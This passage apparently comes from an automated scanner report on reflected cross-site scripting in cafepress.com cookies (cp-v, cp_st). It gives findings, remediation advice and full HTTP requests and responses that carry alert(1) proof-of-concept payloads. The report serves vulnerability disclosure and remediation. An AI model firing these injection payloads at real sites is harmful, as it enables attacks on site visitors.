GET /+boxers HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAbaa43"-alert(1)-"4cc6f92795 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW21 Cteonnt-Length: 59461 Date: Sun, 26 Dec 2010 13:47:31 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:31 GMT; path=/ Set-Cookie: cp_sc=100074; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:31 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59461 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAbaa43"-alert(1)-"4cc6f92795 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.19. http://www.cafepress.com/+boxers [cp_st cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+boxers
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d6727</script><script>alert(1)</script>52729b93123 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+boxers HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=d6727</script><script>alert(1)</script>52729b93123 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW20 Cteonnt-Length: 59479 Date: Sun, 26 Dec 2010 13:47:26 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:26 GMT; path=/ Set-Cookie: cp_sc=100074; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:26 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59479 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = 'd6727</script><script>alert(1)</script>52729b93123 ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.20. http://www.cafepress.com/+bumper-stickers [cp-v cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+bumper-stickers
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 350cc"-alert(1)-"5204568fc11 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+bumper-stickers HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA350cc"-alert(1)-"5204568fc11 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW13 Cteonnt-Length: 59754 Date: Sun, 26 Dec 2010 13:48:57 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:56 GMT; path=/ Set-Cookie: cp_sc=100193; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:56 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59754 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA350cc"-alert(1)-"5204568fc11 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.21. http://www.cafepress.com/+bumper-stickers [cp_st cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+bumper-stickers
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 144cb</script><script>alert(1)</script>4632a294b1c was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+bumper-stickers HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=144cb</script><script>alert(1)</script>4632a294b1c ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW27 ntCoent-Length: 59771 Date: Sun, 26 Dec 2010 13:48:55 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:55 GMT; path=/ Set-Cookie: cp_sc=100193; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:55 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59771 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = '144cb</script><script>alert(1)</script>4632a294b1c ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.22. http://www.cafepress.com/+buttons [cp-v cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+buttons
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e64e3"-alert(1)-"4f4360aac81 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+buttons HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAe64e3"-alert(1)-"4f4360aac81 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW12 Cteonnt-Length: 59646 Date: Sun, 26 Dec 2010 13:48:57 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:57 GMT; path=/ Set-Cookie: cp_sc=100204; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:57 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59646 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAe64e3"-alert(1)-"4f4360aac81 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.23. http://www.cafepress.com/+buttons [cp_st cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+buttons
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 49536</script><script>alert(1)</script>00786d92ac was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+buttons HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=49536</script><script>alert(1)</script>00786d92ac ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 